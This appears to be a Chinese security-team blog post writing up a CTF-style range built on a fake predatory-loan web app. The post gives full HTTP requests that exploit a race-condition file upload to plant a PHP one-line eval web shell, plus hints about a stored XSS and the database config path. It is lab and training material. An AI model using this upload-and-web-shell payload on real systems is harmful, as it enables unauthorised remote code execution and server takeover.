填坑!公开假冒套路贷款程序源码(限时)

  • A+
所属分类:安全闲碎

0x01前言:

不知道大家是否还记得,在HackingClub首场线下技术趴,在最后互动环节公开的靶场

填坑!公开假冒套路贷款程序源码(限时)

在各位大佬各显神通后,终于在两个半小时后拿到webshell!

事后,我们对外开放了几天的靶场环境,供大家玩耍:

填坑!公开假冒套路贷款程序源码(限时)

然后很多大佬找到我,想要这套程序的源码,所以今天决定放出来!

0x02解题方法:

根据提示,找到了上传点:

填坑!公开假冒套路贷款程序源码(限时)

经过多番尝试,发现是条件竞争上传漏洞:

填坑!公开假冒套路贷款程序源码(限时)

包内容:

POST /onup/upload.php HTTP/1.1

Host: 39.98.78.223

Content-Length: 266

Cache-Control: max-age=0

Origin: http://39.98.78.223

Upgrade-Insecure-Requests: 1

DNT: 1

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryviDgu5MACkZpSdGS

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://39.98.78.223/onup/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ko;q=0.7

Cookie: PHPSESSID=pole4gfa4peo53v4b6itu2tsq2

Connection: close

 

------WebKitFormBoundaryviDgu5MACkZpSdGS

Content-Disposition: form-data; name="file"; filename="file.php"

Content-Type: application/octet-stream

 

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["test"])?>');?>

------WebKitFormBoundaryviDgu5MACkZpSdGS--

GET /onup/upload/file.php HTTP/1.1

Host: 39.98.78.223

DNT: 1

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ko;q=0.7

Cookie: PHPSESSID=pole4gfa4peo53v4b6itu2tsq2

Connection: close

 

http://39.98.78.223/onup/upload/shell.php

Getshell

填坑!公开假冒套路贷款程序源码(限时)

0x03后话:

其实如果没有那么限制,还有其他方法解题,那么,舞台交给大家!

代码审计吧!

(已知XSS存储)

(数据库在根目录下,数据库配置文件在WWWAppConfconfig.db.php)

填坑!公开假冒套路贷款程序源码(限时)

0x04源码下载:

关注公众号,回复:假冒贷款

即可下载程序源码!

(限时24小时!请尽快下载!请于下载后请24小时内删除!仅供学习之用)


填坑!公开假冒套路贷款程序源码(限时)


扫码关注不迷路

简历请投递[email protected]

开普勒安全团队欢迎你

本文始发于微信公众号(弥天安全实验室):填坑!公开假冒套路贷款程序源码(限时)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: